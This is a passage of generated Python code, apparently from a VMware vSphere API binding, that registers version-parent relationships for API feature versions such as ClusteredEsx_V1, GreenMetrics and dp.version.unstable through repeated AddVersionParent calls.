AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.version13")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.version14")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.version15")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.version10")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.version11")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.version12")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.v7_0")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.version8")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.version9")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.version6")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.version7")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.version1")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.version4")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.version5")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.version2")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.version3")
AddVersionParent("vim.version.ClusteredEsx_V1", "vim.version.ClusteredEsx_V1")
AddVersionParent("vim.version.fourKnStorageSupport", "vmodl.query.version.version4")
AddVersionParent("vim.version.fourKnStorageSupport", "vmodl.query.version.version3")
AddVersionParent("vim.version.fourKnStorageSupport", "vmodl.query.version.version2")
AddVersionParent("vim.version.fourKnStorageSupport", "vmodl.query.version.version1")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.fourKnStorageSupport", "vmodl.version.version0")
AddVersionParent("vim.version.fourKnStorageSupport", "vmodl.version.version1")
AddVersionParent("vim.version.fourKnStorageSupport", "vmodl.version.version2")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.v6_9_1")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.v6_8_7")
AddVersionParent("vim.version.fourKnStorageSupport", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.fourKnStorageSupport", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.version13")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.version14")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.version15")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.version10")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.version11")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.version12")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.v7_0")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.version8")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.version9")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.version6")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.version7")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.version1")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.version4")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.version5")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.version2")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.version3")
AddVersionParent("vim.version.fourKnStorageSupport", "vim.version.fourKnStorageSupport")
AddVersionParent("vim.version.resetportstatistics", "vmodl.query.version.version4")
AddVersionParent("vim.version.resetportstatistics", "vmodl.query.version.version3")
AddVersionParent("vim.version.resetportstatistics", "vmodl.query.version.version2")
AddVersionParent("vim.version.resetportstatistics", "vmodl.query.version.version1")
AddVersionParent("vim.version.resetportstatistics", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.resetportstatistics", "vmodl.version.version0")
AddVersionParent("vim.version.resetportstatistics", "vmodl.version.version1")
AddVersionParent("vim.version.resetportstatistics", "vmodl.version.version2")
AddVersionParent("vim.version.resetportstatistics", "vim.version.v6_9_1")
AddVersionParent("vim.version.resetportstatistics", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.resetportstatistics", "vim.version.v6_8_7")
AddVersionParent("vim.version.resetportstatistics", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.resetportstatistics", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.resetportstatistics", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.resetportstatistics", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.resetportstatistics", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.resetportstatistics", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.resetportstatistics", "vim.version.version13")
AddVersionParent("vim.version.resetportstatistics", "vim.version.version14")
AddVersionParent("vim.version.resetportstatistics", "vim.version.version15")
AddVersionParent("vim.version.resetportstatistics", "vim.version.version10")
AddVersionParent("vim.version.resetportstatistics", "vim.version.version11")
AddVersionParent("vim.version.resetportstatistics", "vim.version.version12")
AddVersionParent("vim.version.resetportstatistics", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.resetportstatistics", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.resetportstatistics", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.resetportstatistics", "vim.version.v7_0")
AddVersionParent("vim.version.resetportstatistics", "vim.version.version8")
AddVersionParent("vim.version.resetportstatistics", "vim.version.version9")
AddVersionParent("vim.version.resetportstatistics", "vim.version.version6")
AddVersionParent("vim.version.resetportstatistics", "vim.version.version7")
AddVersionParent("vim.version.resetportstatistics", "vim.version.version1")
AddVersionParent("vim.version.resetportstatistics", "vim.version.version4")
AddVersionParent("vim.version.resetportstatistics", "vim.version.version5")
AddVersionParent("vim.version.resetportstatistics", "vim.version.version2")
AddVersionParent("vim.version.resetportstatistics", "vim.version.version3")
AddVersionParent("vim.version.resetportstatistics", "vim.version.resetportstatistics")
AddVersionParent("vim.version.batchRenameSupport", "vmodl.query.version.version4")
AddVersionParent("vim.version.batchRenameSupport", "vmodl.query.version.version3")
AddVersionParent("vim.version.batchRenameSupport", "vmodl.query.version.version2")
AddVersionParent("vim.version.batchRenameSupport", "vmodl.query.version.version1")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.batchRenameSupport", "vmodl.version.version0")
AddVersionParent("vim.version.batchRenameSupport", "vmodl.version.version1")
AddVersionParent("vim.version.batchRenameSupport", "vmodl.version.version2")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.v6_9_1")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.v6_8_7")
AddVersionParent("vim.version.batchRenameSupport", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.batchRenameSupport", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.version13")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.version14")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.version15")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.version10")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.version11")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.version12")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.v7_0")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.version8")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.version9")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.version6")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.version7")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.version1")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.version4")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.version5")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.version2")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.version3")
AddVersionParent("vim.version.batchRenameSupport", "vim.version.batchRenameSupport")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vmodl.query.version.version4")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vmodl.query.version.version3")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vmodl.query.version.version2")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vmodl.query.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.v7_0_1_1")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vmodl.version.version0")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vmodl.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vmodl.version.version2")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "dp.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.v6_9_1")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.v7_0_0_2")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.v6_8_7")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vmodl.reflect.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vmodl.reflect.version.version2")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.v8_0_0_0")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.v7_0_3_1")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.v7_0_3_2")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.v7_0_3_0")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.version13")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.version14")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.version15")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.version10")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.version11")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.version12")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.v7_0_2_0")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.v7_0_2_1")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.v7_0_1_0")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.v7_0")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.version8")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.version9")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.version6")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.version7")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.version1")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.version4")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.version5")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.version2")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "vim.version.version3")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT")
AddVersionParent("dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT", "dp.version.v8_0_0_0")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vmodl.query.version.version4")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vmodl.query.version.version3")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vmodl.query.version.version2")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vmodl.query.version.version1")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vmodl.version.version0")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vmodl.version.version1")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vmodl.version.version2")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.v6_9_1")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.v6_8_7")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.version13")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.version14")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.version15")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.version10")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.version11")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.version12")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.v7_0")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.version8")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.version9")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.version6")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.version7")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.version1")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.version4")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.version5")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.version2")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.version3")
AddVersionParent("vim.version.VM_CLONE_SWITCH_HOST_EMM", "vim.version.VM_CLONE_SWITCH_HOST_EMM")
AddVersionParent("dp.version.unstable", "vmodl.query.version.version4")
AddVersionParent("dp.version.unstable", "vmodl.query.version.version3")
AddVersionParent("dp.version.unstable", "vmodl.query.version.version2")
AddVersionParent("dp.version.unstable", "vmodl.query.version.version1")
AddVersionParent("dp.version.unstable", "vim.version.pcieHotPlugOfFPT")
AddVersionParent("dp.version.unstable", "vim.version.pr1429825")
AddVersionParent("dp.version.unstable", "vim.version.VSPHERE_DP_QUIESCED_SNAPSHOT")
AddVersionParent("dp.version.unstable", "dp.version.VSPHERE_DP_TELEMETRY")
AddVersionParent("dp.version.unstable", "vim.version.MemoryTiering")
AddVersionParent("dp.version.unstable", "vim.version.v7_0_1_1")
AddVersionParent("dp.version.unstable", "vim.version.FCD_VRA_SUPPORT")
AddVersionParent("dp.version.unstable", "vim.version.guestDetailedData")
AddVersionParent("dp.version.unstable", "vim.version.SGX_MPA_VMCheck")
AddVersionParent("dp.version.unstable", "vim.version.vdcs")
AddVersionParent("dp.version.unstable", "vmodl.version.version0")
AddVersionParent("dp.version.unstable", "vim.version.NFS_VMKPORTBIND")
AddVersionParent("dp.version.unstable", "vmodl.version.version1")
AddVersionParent("dp.version.unstable", "vmodl.version.version2")
AddVersionParent("dp.version.unstable", "dp.version.version1")
AddVersionParent("dp.version.unstable", "vim.version.v6_9_1")
AddVersionParent("dp.version.unstable", "vim.version.VMC_NFS_SUPPORT")
AddVersionParent("dp.version.unstable", "vim.version.NsxLiveUpdate")
AddVersionParent("dp.version.unstable", "vim.version.VDS_ReadOnlyDisk")
AddVersionParent("dp.version.unstable", "vim.version.v7_0_0_2")
AddVersionParent("dp.version.unstable", "vim.version.vVol_datastore_scalability")
AddVersionParent("dp.version.unstable", "vim.version.AssignHwCompositeDev")
AddVersionParent("dp.version.unstable", "vim.version.v6_8_7")
AddVersionParent("dp.version.unstable", "vmodl.reflect.version.version1")
AddVersionParent("dp.version.unstable", "vmodl.reflect.version.version2")
AddVersionParent("dp.version.unstable", "vim.version.v8_0_0_0")
AddVersionParent("dp.version.unstable", "vim.version.VQAT")
AddVersionParent("dp.version.unstable", "vim.version.VCDP_NestedFilters")
AddVersionParent("dp.version.unstable", "vim.version.nativeSnapshot")
AddVersionParent("dp.version.unstable", "vim.version.hostProfiles")
AddVersionParent("dp.version.unstable", "vim.version.GraphicsDRS")
AddVersionParent("dp.version.unstable", "vim.version.v7_0_3_1")
AddVersionParent("dp.version.unstable", "vim.version.v7_0_3_2")
AddVersionParent("dp.version.unstable", "vim.version.v7_0_3_0")
AddVersionParent("dp.version.unstable", "vim.version.hwh")
AddVersionParent("dp.version.unstable", "vim.version.version13")
AddVersionParent("dp.version.unstable", "vim.version.version14")
AddVersionParent("dp.version.unstable", "vim.version.version15")
AddVersionParent("dp.version.unstable", "dp.version.VSPHERE_DP_QUIESCED_SNAPSHOT")
AddVersionParent("dp.version.unstable", "vim.version.VSAN2_Configure")
AddVersionParent("dp.version.unstable", "vim.version.DRS_LB_REASONCODE")
AddVersionParent("dp.version.unstable", "vim.version.gosCrashRemediation")
AddVersionParent("dp.version.unstable", "vim.version.VCSOF_173")
AddVersionParent("dp.version.unstable", "vim.version.pciSriovExtendedID")
AddVersionParent("dp.version.unstable", "vim.version.vmxnet3UPT")
AddVersionParent("dp.version.unstable", "vim.version.version10")
AddVersionParent("dp.version.unstable", "vim.version.version11")
AddVersionParent("dp.version.unstable", "vim.version.VMcrypt_IntegrityProtection")
AddVersionParent("dp.version.unstable", "vim.version.version12")
AddVersionParent("dp.version.unstable", "vim.version.pciDeviceExt")
AddVersionParent("dp.version.unstable", "vim.version.toolsOffHost")
AddVersionParent("dp.version.unstable", "vim.version.hostCertificateManagement")
AddVersionParent("dp.version.unstable", "vim.version.vmMisc")
AddVersionParent("dp.version.unstable", "vim.version.VLCM_QuickLaunchPreload")
AddVersionParent("dp.version.unstable", "vim.version.LSI2PVSCSI")
AddVersionParent("dp.version.unstable", "vim.version.ProvisioningEventRefresh")
AddVersionParent("dp.version.unstable", "vim.version.OVF_SINGLEDEPLOY_API")
AddVersionParent("dp.version.unstable", "vim.version.v7_0_2_0")
AddVersionParent("dp.version.unstable", "vim.version.pr1803450")
AddVersionParent("dp.version.unstable", "vim.version.v7_0_2_1")
AddVersionParent("dp.version.unstable", "vim.version.VMcrypt_OnlineVMEncryption")
AddVersionParent("dp.version.unstable", "vim.version.FT_VBS_SUPPORT")
AddVersionParent("dp.version.unstable", "vim.version.WCP_FaultDomains")
AddVersionParent("dp.version.unstable", "vim.version.dnd")
AddVersionParent("dp.version.unstable", "vim.version.optional_virtual_disks")
AddVersionParent("dp.version.unstable", "vim.version.hwh2_0")
AddVersionParent("dp.version.unstable", "vim.version.v7_0_1_0")
AddVersionParent("dp.version.unstable", "vim.version.VM_OP_NOTIFICATION_TO_APP_V1")
AddVersionParent("dp.version.unstable", "vim.version.EventsOrdering")
AddVersionParent("dp.version.unstable", "vim.version.PMemV2")
AddVersionParent("dp.version.unstable", "vim.version.v7_0")
AddVersionParent("dp.version.unstable", "vim.version.FileLockInfo_GSS34")
AddVersionParent("dp.version.unstable", "vim.version.version8")
AddVersionParent("dp.version.unstable", "vim.version.version9")
AddVersionParent("dp.version.unstable", "vim.version.version6")
AddVersionParent("dp.version.unstable", "vim.version.version7")
AddVersionParent("dp.version.unstable", "vim.version.DiskGroupVMC")
AddVersionParent("dp.version.unstable", "vim.version.TrustAuthority_V4")
AddVersionParent("dp.version.unstable", "vim.version.version1")
AddVersionParent("dp.version.unstable", "vim.version.version4")
AddVersionParent("dp.version.unstable", "vim.version.version5")
AddVersionParent("dp.version.unstable", "vim.version.SRIOVValidNumVFs")
AddVersionParent("dp.version.unstable", "vim.version.version2")
AddVersionParent("dp.version.unstable", "vim.version.version3")
AddVersionParent("dp.version.unstable", "vim.version.NDU_VSPHERE_HA_INTEGRATION")
AddVersionParent("dp.version.unstable", "vim.version.VmxRebootPowerOff")
AddVersionParent("dp.version.unstable", "vim.version.ClusteredEsx_V1")
AddVersionParent("dp.version.unstable", "vim.version.fourKnStorageSupport")
AddVersionParent("dp.version.unstable", "vim.version.resetportstatistics")
AddVersionParent("dp.version.unstable", "vim.version.batchRenameSupport")
AddVersionParent("dp.version.unstable", "dp.version.VSPHERE_DP_PER_DISK_SNAPSHOT")
AddVersionParent("dp.version.unstable", "vim.version.VM_CLONE_SWITCH_HOST_EMM")
AddVersionParent("dp.version.unstable", "dp.version.unstable")
AddVersionParent("dp.version.unstable", "vim.version.SGX_MPA_HostReg")
AddVersionParent("dp.version.unstable", "vim.version.GreenMetrics")
AddVersionParent("dp.version.unstable", "vim.version.hostVendorSpecificStatus")
AddVersionParent("dp.version.unstable", "vim.version.VMcrypt_V4")
AddVersionParent("dp.version.unstable", "vim.version.hostAccessManager")
AddVersionParent("dp.version.unstable", "vim.version.ocmSupportedForReconfigure")
AddVersionParent("dp.version.unstable", "dp.version.v8_0_0_0")
AddVersionParent("dp.version.unstable", "vim.version.VirtualTopo")
AddVersionParent("dp.version.unstable", "vim.version.Tools_Update_Health")
AddVersionParent("dp.version.unstable", "vim.version.CPU_Scheduler_Info")
AddVersionParent("dp.version.unstable", "vim.version.VM_CLONE_REKEY_TPM")
AddVersionParent("dp.version.unstable", "vim.version.FCD_CATALOG_HEALTH")
AddVersionParent("dp.version.unstable", "vim.version.smartnic_vc")
AddVersionParent("dp.version.unstable", "vim.version.HWv20")
AddVersionParent("dp.version.unstable", "vim.version.unstable")
AddVersionParent("dp.version.unstable", "vim.version.FT_DRS_METRO_CLUSTER")
AddVersionParent("dp.version.unstable", "vim.version.VSAN_DeltaCompEnsureDurability")
AddVersionParent("dp.version.unstable", "vim.version.bmcInfo")
AddVersionParent("dp.version.unstable", "vim.version.vHT")
AddVersionParent("dp.version.unstable", "vim.version.ClusterConfigManagerV2")
AddVersionParent("dp.version.unstable", "vim.version.smartnic_network")
AddVersionParent("dp.version.unstable", "vim.version.DVX")
AddVersionParent("dp.version.unstable", "vim.version.VmcExternalStorageSupport")
AddVersionParent("dp.version.unstable", "vim.version.PodVMOnVDS")
AddVersionParent("dp.version.unstable", "vim.version.ClusterConfigManagerTransition")
AddVersionParent("dp.version.unstable", "vim.version.LiveUpdate")
AddVersionParent("dp.version.unstable", "vim.version.Vmfs_Unmap_Ultralow_Rate")
AddVersionParent("dp.version.unstable", "vim.version.VMcrypt3_KeyCustomAttribute")
AddVersionParent("dp.version.unstable", "vim.version.E2ENativeNVMeSupport")
AddVersionParent("dp.version.unstable", "vim.version.FCD_PERFORMANCE")
AddVersionParent("dp.version.unstable", "vim.version.SPBM_DISK_PROV_VIA_POLICY")
AddVersionParent("dp.version.unstable", "vim.version.nsx_uens_u2")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vmodl.query.version.version4")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vmodl.query.version.version3")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vmodl.query.version.version2")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vmodl.query.version.version1")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vmodl.version.version0")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vmodl.version.version1")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vmodl.version.version2")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v6_9_1")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v6_8_7")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v7_0_3_2")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v7_0_3_0")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version13")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version14")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version15")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version10")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version11")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version12")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v7_0_2_0")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v7_0_2_1")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v7_0_1_0")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.v7_0")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version8")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version9")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version6")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version7")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version1")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version4")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version5")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version2")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.version3")
AddVersionParent("vim.version.SGX_MPA_HostReg", "vim.version.SGX_MPA_HostReg")
AddVersionParent("vim.version.GreenMetrics", "vmodl.query.version.version4")
AddVersionParent("vim.version.GreenMetrics", "vmodl.query.version.version3")
AddVersionParent("vim.version.GreenMetrics", "vmodl.query.version.version2")
AddVersionParent("vim.version.GreenMetrics", "vmodl.query.version.version1")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v7_0_1_1")
AddVersionParent("vim.version.GreenMetrics", "vmodl.version.version0")
AddVersionParent("vim.version.GreenMetrics", "vmodl.version.version1")
AddVersionParent("vim.version.GreenMetrics", "vmodl.version.version2")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v6_9_1")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v7_0_0_2")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v6_8_7")
AddVersionParent("vim.version.GreenMetrics", "vmodl.reflect.version.version1")
AddVersionParent("vim.version.GreenMetrics", "vmodl.reflect.version.version2")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v8_0_0_0")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v7_0_3_1")
AddVersionParent("vim.version.GreenMetrics", "vim.version.v7_0_3_2")
